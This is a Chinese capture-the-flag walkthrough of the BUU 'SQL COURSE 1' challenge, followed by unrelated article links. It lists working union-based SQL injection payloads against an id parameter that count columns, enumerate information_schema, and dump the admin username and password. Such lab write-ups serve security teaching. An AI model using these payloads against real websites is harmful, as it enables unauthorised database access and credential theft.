BUU SQL COURSE 1

发现有登录框,爆破半天也爆破不出来,只能从别的地方下手了

F12一下

发现了一个传参

进去发现id可以传参,sql注入一下试试

前三个都有回显,当id=4的时候页面没有回显了,正好验证 了页面 有三个新闻

当order by =3的时候又没有回显了,这时可以判断有2个字段

当我们查询显错位的时候,发现页面没有变化,考虑到是不是过滤了什么

?id=-1 union select 1,2

于是在传参点把1改为-1 就可以看到页面有回显了

?id=-1 union select 1,database() 查库名

查表名

?id=-1 union select 1,table_name from information_schema.tables where table_schema='news'

查字段 ?id=-1 union select 1,column_name from information_schema.columns where table_name='admin'

这不是我们要的字段,我们要找的是username 和password

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit0,1

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1

查数据

?id=-1 union select 1,username from admin limit 0,1

?id=-1 union select 1,password from admin limit 0,1

拿着账号密码去登录

登录成功 flag就出来了

相关推荐
瀚高PG实验室15 小时前
HGDB集群(安全版)repmgr手动切换主备库
java·数据库·安全·瀚高数据库
mit6.82415 小时前
[C# starter-kit] Domain Entities | `AuditableEntity`基类 | 跟踪变化 | 软删除
数据库·microsoft·c#
潇凝子潇15 小时前
MySQL Redo Log 和 Undo Log 满了会有什么问题
数据库·mysql
周杰伦_Jay17 小时前
【Homebrew安装 MySQL 】macOS 用 Homebrew 安装 MySQL 完整教程
数据库·mysql·macos
悟能不能悟1 天前
redis的红锁
数据库·redis·缓存
安当加密1 天前
MySQL数据库透明加密(TDE)解决方案:基于国密SM4的合规与性能优化实践
数据库·mysql·性能优化
JH30731 天前
第七篇:Buffer Pool 与 InnoDB 其他组件的协作
java·数据库·mysql·oracle
板凳坐着晒太阳1 天前
ClickHouse 配置优化与问题解决
数据库·clickhouse
数据库生产实战1 天前
解析Oracle 19C中并行INSERT SELECT的工作原理
数据库·oracle
AAA修煤气灶刘哥1 天前
服务器指标多到“洪水泛滥”?试试InfluxDB?
数据库·后端·面试